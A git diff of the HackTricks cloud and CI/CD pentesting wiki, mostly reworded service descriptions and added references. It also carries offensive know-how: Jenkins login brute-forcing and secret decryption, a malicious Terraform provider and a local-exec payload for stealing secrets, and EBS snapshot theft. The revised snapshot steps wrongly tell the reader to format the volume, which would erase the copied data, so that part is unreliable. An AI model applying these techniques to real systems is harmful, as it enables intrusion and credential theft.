diff --git a/SUMMARY.md b/SUMMARY.md index 3b46f64792..468cbc954f 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -30,7 +30,6 @@ * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) - * [SCM IP Whitelisting Bypass](pentesting-ci-cd/jenkins-security/scm-ip-whitelisting-bypass.md) * [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) @@ -214,7 +213,6 @@ * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) - * [AWS - SSM Post-Exploitation](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-ssm-post-exploitation.md) * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-malicious-vpc-mirror.md) * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) diff --git a/pentesting-ci-cd/apache-airflow-security/README.md b/pentesting-ci-cd/apache-airflow-security/README.md index 21c447533a..9d30aa2f07 100644 --- a/pentesting-ci-cd/apache-airflow-security/README.md +++ b/pentesting-ci-cd/apache-airflow-security/README.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and \_orchestration of data pipelines or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. +[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. @@ -77,7 +77,7 @@ Airflow by default will show the value of the variable in the GUI, however, acco ![](<../../.gitbook/assets/image (79).png>) However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ -****To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ +To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: ![](<../../.gitbook/assets/image (30).png>) diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 35869deb4e..3075f7948e 100644 --- a/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## RBAC -Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. +(From the docs)[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. * **`Admin`** users have all possible permissions. * **`Public`** users (anonymous) don’t have any permissions. diff --git a/pentesting-ci-cd/atlantis-security.md b/pentesting-ci-cd/atlantis-security.md index 4a9801096e..f56a173530 100644 --- a/pentesting-ci-cd/atlantis-security.md +++ b/pentesting-ci-cd/atlantis-security.md @@ -53,6 +53,8 @@ Atlantis is going to be **exposing webhooks** so the git server can send it info ### Provider Credentials +[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) + Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: @@ -401,6 +403,7 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` ## References * [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) +* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
diff --git a/pentesting-ci-cd/circleci-security.md b/pentesting-ci-cd/circleci-security.md index 59f2267bd7..657692afb9 100644 --- a/pentesting-ci-cd/circleci-security.md +++ b/pentesting-ci-cd/circleci-security.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: ## Basic Information -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. ## Permissions diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md index fd4f8625c0..2a08efad8b 100644 --- a/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -39,6 +39,10 @@ In order to execute tasks concourse must have some workers. These workers **regi * **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. * **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. +# References +* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) + +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index fea48eef1c..4ade32fc41 100644 --- a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -32,7 +32,7 @@ Note that Concourse **groups pipelines inside Teams**. Therefore users belonging ## Vars & Credential Manager -In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\ +In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ The **optional **_**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. @@ -451,6 +451,9 @@ User-Agent: Go-http-client/1.1. Accept-Encoding: gzip. ``` +# References +* https://concourse-ci.org/vars.html +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-ci-cd/jenkins-security/README.md b/pentesting-ci-cd/jenkins-security/README.md index 89521bcda7..e729e63db6 100644 --- a/pentesting-ci-cd/jenkins-security/README.md +++ b/pentesting-ci-cd/jenkins-security/README.md @@ -16,8 +16,8 @@ Other ways to support HackTricks: ## Basic Information -Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\ -Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html). +Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. + {% content-ref url="basic-jenkins-information.md" %} [basic-jenkins-information.md](basic-jenkins-information.md) @@ -65,7 +65,7 @@ Also if **SSO** **functionality**/**plugins** were present then you should attem ### Bruteforce -**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords). +**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**. ``` msf> use auxiliary/scanner/http/jenkins_login @@ -77,13 +77,13 @@ Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/pass ### IP Whitelisting Bypass -Many orgs combines **SaaS-based source control management (SCM) systems** (like GitHub or GitLab) with an **internal**, self-hosted **CI** solution (e.g. Jenkins, TeamCity) allowing these CI systems to **receive webhook events from the SaaS source** control vendors, for the simple purpose of triggering pipeline jobs. +Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs. -Therefore, the orgs **whitelists** the **IP** ranges of the **SCM** allowing them to reach the **internal** CI system with **webhooks**. However, note how **anyone** can create an **account** in Github or Gitlab and make it **trigger a webhook** that could send a request to that **internal CI system**. +To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**. -{% content-ref url="scm-ip-whitelisting-bypass.md" %} -[scm-ip-whitelisting-bypass.md](scm-ip-whitelisting-bypass.md) -{% endcontent-ref %} + +Check: +[shttps://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/](https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/) ## Internal Jenkins Abuses @@ -125,7 +125,7 @@ You will usually find Jenkins ssh credentials in a **global provider** (`/creden Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**. -By default, Jenkins will **“run as system” builds**. In other words, they assign it to the **all-powerful SYSTEM user**, meaning any action executed during the build has permission to do whatever it wants. +By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**. ### **RCE Creating/Modifying a project** @@ -403,6 +403,7 @@ println(hudson.util.Secret.decrypt("{...}")) * [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password) * [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html) * [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072) +* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md index 0735196e99..42c2eeff53 100644 --- a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md +++ b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md @@ -67,6 +67,8 @@ Plugins can provide additional security realms which may be useful for incorpora ## Jenkins Nodes, Agents & Executors +Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/): + **Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold. **Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine. @@ -77,6 +79,7 @@ An **executor** is a **slot for execution of tasks**; effectively, it is **a thr ### Encryption of Secrets and Credentials +Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored **_**unencrypted**_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include: * `hudson.util.Secret`: used for generic secrets; @@ -96,6 +99,10 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m * [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/) * [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) * [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/) +* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/) +* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery) +* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials) +* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
diff --git a/pentesting-ci-cd/okta-security/README.md b/pentesting-ci-cd/okta-security/README.md index 7b91bd6523..c09e565cae 100644 --- a/pentesting-ci-cd/okta-security/README.md +++ b/pentesting-ci-cd/okta-security/README.md @@ -16,11 +16,17 @@ Other ways to support HackTricks: ## Basic Information -Okta, Inc. is an **identity and access management company** that provides cloud software to help companies **manage and secure user authentication into modern applications**, and for developers to build identity controls into applications, website web services and devices. +[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. -Their core service, called the Okta Identity Cloud, offers products that include single sign-on (SSO), multi-factor authentication (MFA), lifecycle management, universal directory, API access management, and more. This helps companies to both protect their sensitive data and also streamline user access, making applications and services more accessible and easy to use for employees or customers. +The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: -Okta's services are widely used in enterprise contexts, as well as by smaller companies and developers. It plays a crucial role in enabling businesses to securely adopt and manage cloud technologies. As of my knowledge cutoff in September 2021, Okta remains a significant player in the Identity and Access Management (IAM) industry. +- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. +- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. +- **Lifecycle Management**: Automates user account creation, update, and deactivation processes. +- **Universal Directory**: Enables centralized management of users, groups, and devices. +- **API Access Management**: Secures and manages access to APIs. + +These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. {% hint style="danger" %} The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. diff --git a/pentesting-ci-cd/okta.md b/pentesting-ci-cd/okta.md index fa9f1e4973..2772d38a9f 100644 --- a/pentesting-ci-cd/okta.md +++ b/pentesting-ci-cd/okta.md @@ -16,11 +16,17 @@ Other ways to support HackTricks: ## Basic Information -Okta, Inc. is an **identity and access management company** that provides cloud software to help companies **manage and secure user authentication into modern applications**, and for developers to build identity controls into applications, website web services and devices. +[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. -Their core service, called the Okta Identity Cloud, offers products that include single sign-on (SSO), multi-factor authentication (MFA), lifecycle management, universal directory, API access management, and more. This helps companies to both protect their sensitive data and also streamline user access, making applications and services more accessible and easy to use for employees or customers. +The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: -Okta's services are widely used in enterprise contexts, as well as by smaller companies and developers. It plays a crucial role in enabling businesses to securely adopt and manage cloud technologies. As of my knowledge cutoff in September 2021, Okta remains a significant player in the Identity and Access Management (IAM) industry. +- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. +- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. +- **Lifecycle Management**: Automates user account creation, update, and deactivation processes. +- **Universal Directory**: Enables centralized management of users, groups, and devices. +- **API Access Management**: Secures and manages access to APIs. + +These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. {% hint style="danger" %} The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md index 918cce7f9a..ab0ba11121 100644 --- a/pentesting-ci-cd/terraform-security.md +++ b/pentesting-ci-cd/terraform-security.md @@ -16,6 +16,8 @@ Other ways to support HackTricks: ## Basic Information +[From the docs: ](https://developer.hashicorp.com/terraform/intro) + HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features. ### How does Terraform work? @@ -34,15 +36,6 @@ The core Terraform workflow consists of three stages: ![](<../.gitbook/assets/image (81).png>) -### Terraform Enterprise - -Terraform Enterprise allows you to **run commands** such as `terraform plan` or `terraform apply` remotely in a **self-hosted version of Terraform Cloud**. Therefore, if you find the **API key** to access that Terraform server, you can **compromise it**.\ -For more info check: - -{% content-ref url="broken-reference" %} -[Broken link](broken-reference) -{% endcontent-ref %} - ## Terraform Lab Just install terraform in your computer. @@ -83,14 +76,7 @@ data "external" "example" { #### Using a custom provider -Anyone can write a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) and publish it to the [Terraform Registry](https://registry.terraform.io/). You could also try to pull a custom provider from a private registry. - -That’s it: - -* write a custom provider than runs some malicious code (like exfiltrating credentials or customer data) - * publish it to the Terraform Registry - * add the provider to the Terraform code in a feature branch - * open a PR for the feature branch +An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): ```javascript terraform { @@ -105,7 +91,7 @@ That’s it: provider "evil" {} ``` -Since the provider will be pulled in during the `init` and run some code during the `plan`, you have arbitrary code execution. +The provider is downloaded in the `init` and will run the malicious code when `plan` is executed You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) @@ -128,7 +114,7 @@ You can find the rev shell code in [https://github.com/carlospolop/terraform\_ex ### Terraform Apply Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -\*\*\*\*You just need to make sure some payload like the following ones ends in the `main.tf` file: +You just need to make sure some payload like the following ones ends in the `main.tf` file: ```json // Payload 1 to just steal a secret @@ -167,6 +153,8 @@ output "dotoken" { * [Atlantis Security](atlantis-security.md) * [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) +* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro) +
diff --git a/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md index 27abe577e7..1344910851 100644 --- a/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md +++ b/pentesting-cloud/aws-pentesting/aws-persistence/aws-s3-persistence.md @@ -32,7 +32,7 @@ Therefore, and attacker could get this key from the metadata and decrypt with KM ### Using S3 ACLs -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if they can enable team) to keep access to the S3 bucket. +Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
diff --git a/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md index 2c60aa658e..a46939312d 100644 --- a/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md +++ b/pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md @@ -16,8 +16,9 @@ Other ways to support HackTricks: ## Kinesis Data Firehose -Amazon Kinesis Data Firehose is a **fully managed service for delivering real-time** [**streaming data**](http://www.amazonaws.cn/streaming-data/) **to destinations** such as Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and any custom HTTP endpoint.\ -With Kinesis Data Firehose, you don't need to write applications or manage resources. You **configure your data producers** to send data to Kinesis Data Firehose, and it **automatically delivers the data to the destination** that you specified. You can also configure Kinesis Data Firehose **to transform your data before delivering it**. +Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. + +The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. ### Enumeration diff --git a/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md index e4677cd8a2..826dd5f1ff 100644 --- a/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md +++ b/pentesting-cloud/aws-pentesting/aws-services/aws-organizations-enum.md @@ -16,7 +16,13 @@ Other ways to support HackTricks: ## Baisc Information -AWS Organizations lets you create new AWS accounts at no additional charge. With accounts in an organization, you can easily allocate resources, group accounts, and apply governance policies to accounts or groups. +AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. + +Key Points: +- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. +- **Resource Allocation**: It simplifies the process of allocating resources across the accounts. +- **Account Grouping**: Accounts can be grouped together, making management more streamlined. +- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. You can find more information in: @@ -45,6 +51,9 @@ aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y aws iam get-account-summary ``` +# References +* https://aws.amazon.com/organizations/ +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/pentesting-cloud/aws-security/aws-basic-information/README.md index ce5ea96f18..e6f27e3079 100644 --- a/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -171,7 +171,7 @@ An IAM role consists of **two types of policies**: A **trust policy**, which can #### AWS Security Token Service (STS) -This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). +AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for: ### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id\_credentials\_temp.html) diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index c2f894138a..f030e2c169 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -59,27 +59,40 @@ aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snaps **Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): -**step 1:** Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes. -**Step 2:** Select the created volume, right click and select the “attach volume” option. +To be able to perform this action, follow these commands: +- Create an EBS volume to attach to the EC2 instance. +- Ensure that the EBS volume and the instance are in the same zone. -**Step 3:** Select the instance from the instance text box as shown below. +Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. -![](<../../../../.gitbook/assets/image (6) (1) (1) (1).png>) +Step 3: The instance from the instance text box is to be selected. -**Step 4**_:_ Now, login to your ec2 instance and list the available disks using the following command. +To be able to perform this action, use the following command: +- Attach the EBS volume. -``` -lsblk -``` +Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. + +Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. + +If the output of the above command shows "/dev/xvdf: data", it means the volume is empty. + +Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs. -The above command will list the disk you attached to your instance. +Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume". -**Step 5:** +To be able to perform this action, use the command `sudo mkdir /newvolume`. -![](<../../../../.gitbook/assets/image (59).png>) +Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`. -You can do this with Pacu using the module ebs\_\_explore\_snapshots +Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount. + +To be able to perform this action, use the following commands: +- Change directory to `/newvolume`. +- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. + +You can do this with Pacu using the module `ebs__explore_snapshots`. ### Checking a snapshot in AWS (using cli) @@ -117,6 +130,10 @@ Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the ha You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. + +# References +* https://devopscube.com/mount-ebs-volume-ec2-instance/ +
